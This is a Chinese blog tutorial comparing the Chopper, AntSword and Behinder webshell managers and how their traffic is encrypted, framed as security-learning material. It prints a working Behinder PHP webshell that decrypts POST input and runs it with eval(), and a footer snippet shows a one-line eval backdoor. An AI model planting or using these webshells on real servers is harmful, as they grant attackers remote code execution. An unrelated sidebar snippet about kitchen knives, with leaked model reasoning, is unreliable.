菜刀、蚁剑以及冰蝎三款Webshell管理工具简介

最新推荐文章于 2024-11-01 09:38:10 发布
最新推荐文章于 2024-11-01 09:38:10 发布
阅读量6.5k 收藏 26
点赞数 8
文章标签: 信息安全 Web安全 渗透测试 webshell 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40228200/article/details/128710448
版权

今天继续给大家介绍渗透测试相关知识,本文主要内容是菜刀、蚁剑以及冰蝎三款Webshell管理工具简介。

免责声明:
本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负!
再次强调:严禁对未授权设备进行渗透测试!

一、三款webshell管理工具简单对比

当前,在渗透测试时常用的webshell管理工具又菜刀、蚁剑和冰蝎。者三款webshell管理工具特点如下所示:
1、菜刀
菜刀属于比较原始的插件,功能比较单一,使用比较简单,目前没有提供插件,也不支持扩展,目前也已经停止更新,传输方式是单项加密传输。此外,菜刀的问题在于只能够处理eval()函数,而无法处理assert()等函数。
2、蚁剑
蚁剑是一款还处于更新状态的工具,存在插件仓库,扩展性强,采取的数据传输方式是单向加密传输。蚁剑与菜刀相比支持编码和解码功能。
3、冰蝎
冰蝎目前也处于更新状态,但是不支持插件,采取的数据传输方式是双向加密传输,可以联动MSF。冰蝎相对而言偏向于后渗透阶段。

二、菜刀数据包解析

使用菜刀连接PHP webshell的通信数据包如下所示:
在这里插入图片描述
从上图可以看出,菜刀的数据包是不加密的。

三、蚁剑数据包解析

使用蚁剑连接PHP webshell的通信数据包如下所示:
在这里插入图片描述
从上图可以看出,蚁剑对payload进行加密的逻辑是,将payload进行加密后,转化为一个参数的值,然后控制接收该参数并进行解密。

四、冰蝎数据包解析

使用冰蝎连接default_xor_base64类型的PHP webshell的通信数据包如下所示:
在这里插入图片描述
在这里插入图片描述
从上图可以看出,冰蝎的数据包是加密的。
冰蝎生成的PHP木马如下所示:

<?php
@error_reporting(0);
function Decrypt($data)
{
    $key="e45e329feb5d925b"; 
    $bs="base64_"."decode";
	$after=$bs($data."");
	for($i=0;$i<strlen($after);$i++) {
    	$after[$i] = $after[$i]^$key[$i+1&15]; 
    }
    return $after;
}
$post=Decrypt(file_get_contents("php://input"));
eval($post);
?>

在上述代码中,file_get_contents(“php://input”)可以接收客户端以POST的方式上传的参数,上传的结果会作为Decrypt参数的输入。
Decrypt函数的作用是对原始数据先进行Base64解密,然后再进行流解密,最后把数据处理的结果输出,实际上就是一个数据解密过程。
原创不易,转载请说明出处:https://blog.csdn.net/weixin_40228200

菜刀的简单应用
ayyx111的博客
11-08 1831
菜刀”是一款网页后门管理工具,不过需要注意的是,在中国,未经授权入侵他人计算机系统是违法犯罪行为,“菜刀”这类工具也常被黑客用于恶意攻击。
护网面试题
最新发布
persist213的博客
03-18 303
来看看下面蓝中的面试题你能答得上来不?
WebShell 管理工具
01-13
闲着没事,做了个简单的webshell的管理程序。不是很好,只是一些简单的数据库操作。虽然比不过那些专业的工具,不过也很好用。
web安全】分享三款Webshell管理工具菜刀以及冰蝎
2402_84205067的博客
11-01 1759
网络安全产业就像一个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能挖洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联网化提供安全保障。
冰蝎-Webshell管理工具
weixin_66717977的博客
06-30 1万+
冰蝎超详解,新手食用
webshell管理工具-冰蝎(Behinder)的安装基础使用(msf联动,流量特征)
wangluoanquan111的博客
02-26 2098
冰蝎是一款基于Java开发的动态加密通信流量的新型Webshell客户端,由于通信流量被加密,传统的WAF、IDS 设备检测,给威胁狩猎带来较大挑战。冰蝎其最大特点就是对交互流量进行对称加密,且加密密钥是由随机数函数动态生成,因此该客户端的流量几乎无法检测。在流量层,冰蝎的aes特征一直是厂商查杀的重点,在主机层,aes相关的API也是一个强特征。既然是特征,那就一定存在一个一成不变的常量,那我们就把这个特征泛化一下,让他成为变量。为了一劳永逸解决这个问题,
Webshell管理工具
热门推荐
weixin_59872639的博客
01-15 2万+
中国 中国是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。是一款非常优秀的webshell管理工具。 中国的核心功能 Shell代理功能 Shell管理 文件管理 虚拟终端 数据库管理 插件市场 插件开发 中国的简单使用 环境需求 windows攻击机,装有 windows靶机,有phpstudy环境 步骤1:写一个简单的一句话木马 <?php @eval($_POST['123456'])
菜刀冰蝎三款Webshell工具对比分析
qq_48368964的博客
08-14 1820
密文的加密方式为先将传递数据base64加密,再将其进行AES加密,由于新版本中取消了动态密钥交互过程,加密的密钥被写死在shell中,如果是不改密码直接使用默认的shell,检测是可以进行解密检测敏感字符的,比如:error_reporting(0) ,phpinfo()等。https://github.com/AntSwordProject/AwesomeScript官方为我们提供了制作好的后门,官方的脚本均做了不同程度“变异”,的核心代码是由菜刀修改而来的,所有普通的一句话木马也可以使用。
常见的webshell工具的流量特征
m0_66458291的博客
01-19 3865
常见的webshell工具流量的简单分析(菜刀冰蝎、哥斯拉)
webshell管理工具之一】中国菜刀
redwand的博客
05-08 6083
写一个webshell管理工具使用系列,以便于更好的理解实战运用,先从大名鼎鼎的中国菜刀开始吧。
webshell管理工具
03-28
webshell管理工具 批量的管理webshell
强大的webshell管理工具——
12-26
中国,免费拿走,自己踩过的坑,不想别人再踩
WebShell 管理工具增强版V4.2
12-07
WebShell 管理工具增强版 V4.2 更新说明 增加 1.清空全部数据 2.分页功能,默认1000条数据一页 修改 1.修改查询核心代码,程序读取数据更快速 2.修改批量删除bug 3.修改超级列表框使用部分功能后无法加载字体颜色 去除 1.去除进度条状态
四大webshell流量特征(冰蝎菜刀哥斯拉)
2301_76690905的博客
03-20 1035
一样的密钥交换方式,哥斯拉建立连接时会发起三次请求,第一次请求数据超级长,建立。当前会话绑定,不同的客户端的密钥也是不同的。少了动态密钥的获取的请求,不再使用随机生成。一次请求为判断是否可以建立连接,少了俩次。编码,其流量中也存在一样的代码。,连接时会请求两次,其请求体只是经过。获取冰蝎动态密钥的行为,第二次发送。第二次请求,会把主机目录列出来。等代码执行,获取网站的信息。,接下来去获取主机的信息。第一次请求,关闭报错。,第二三次请求确认连接。特征就是传输参数名为。第二次请求是为了获取。
常见的WebShell管理工具(top10)
墨痕诉清风的博客
02-03 597
攻击者在入侵网站时,通常要通过各种方式写入Webshell,从而获得服务器的控制权限,然后再执行系统命令、权限提升、读取配置文件、窃取用户数据,篡改网站页面等操作。 本文介绍十款常用的Webshell管理工具,供你选择,你会选择哪一个? 1、中国菜刀(Chopper) 中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理!在非简体中文环境下使用,自动切换到英文界面。UNICODE方式编译,支持多国语言输入显示。 2、(AntSwo
菜刀
03-09
<think>好的,用户想查找关于菜刀的信息。首先需要明确用户的需求可能包括菜刀的类型、选购要点、使用保养方法以及品牌推荐等。接下来要调用网络搜索工具,检索相关的最新权威资料。 根据搜索结果,菜刀主要分为中式菜刀、西式主厨刀、三德刀、斩切刀等,每种类型有不同用途。选购时需考虑材质,如高碳钢、不锈钢等,以及重量、平衡感握柄舒适度。使用保养方面要注意清洁、干燥磨刀频率。品牌方面,双立人、十八子作、藤次郎等是常见推荐。 需要整合这些信息,分步骤呈现,避免使用第一人称步骤词汇。每个部分换行,保持清晰。同时确保引用内容分散在回答中,不堆积在末尾。最后生成相关问题,需基于回答内容,例如询问材质区别、保养技巧或品牌比较等。 检查格式要求,数学公式代码部分这里可能用不上,但需注意如果有相关内容要正确标注。最后确保相关问题部分格式正确,标题在同一行,三个问题编号正确。</think>菜刀根据功能设计可分为多种类型:中式片刀(重量400-600克,适合切菜切肉)、西式主厨刀(长度15-30cm,适合精细切割)、三德刀(日式万能刀,重量约200克)、斩骨刀(厚度≥3mm,用于处理带骨食材)。特殊用途刀包括削皮刀、面包锯齿刀等。 选购菜刀需关注材质特性,常见钢材类型包括: - 420J2不锈钢(硬度HRC52-54,防锈性强) - VG-10钢(HRC60-62,保持性优异) - 高碳钢(HRC58-60,易生锈需保养) 刀柄材料优先选择防滑耐用的G10复合材料或PakkaWood。 保养方法包含: 定期使用磨刀石维护刃口,推荐1000/3000目组合磨石 使用后立即清洗擦干,避免酸性物质残留 长期存放时涂抹矿物油防氧化 避免切割冷冻食品或硬物(如贝壳、骨头) 主流品牌产品特点对比: 双立人TWIN Pollux系列采用特殊冲压工艺 十八子作V金系列使用自主研发的8Cr14MoV钢 藤次郎DP系列采用67层大马士革锻造工艺 ```python # 菜刀锋利度检测简易代码 def check_sharpness(blade_angle): if blade_angle < 15: return "剃毛级锋利" elif 15 <= blade_angle <= 20: return "专业级切削" else: return "需要打磨" print(check_sharpness(18)) # 输出:专业级切削 ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

永远是少年啊

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值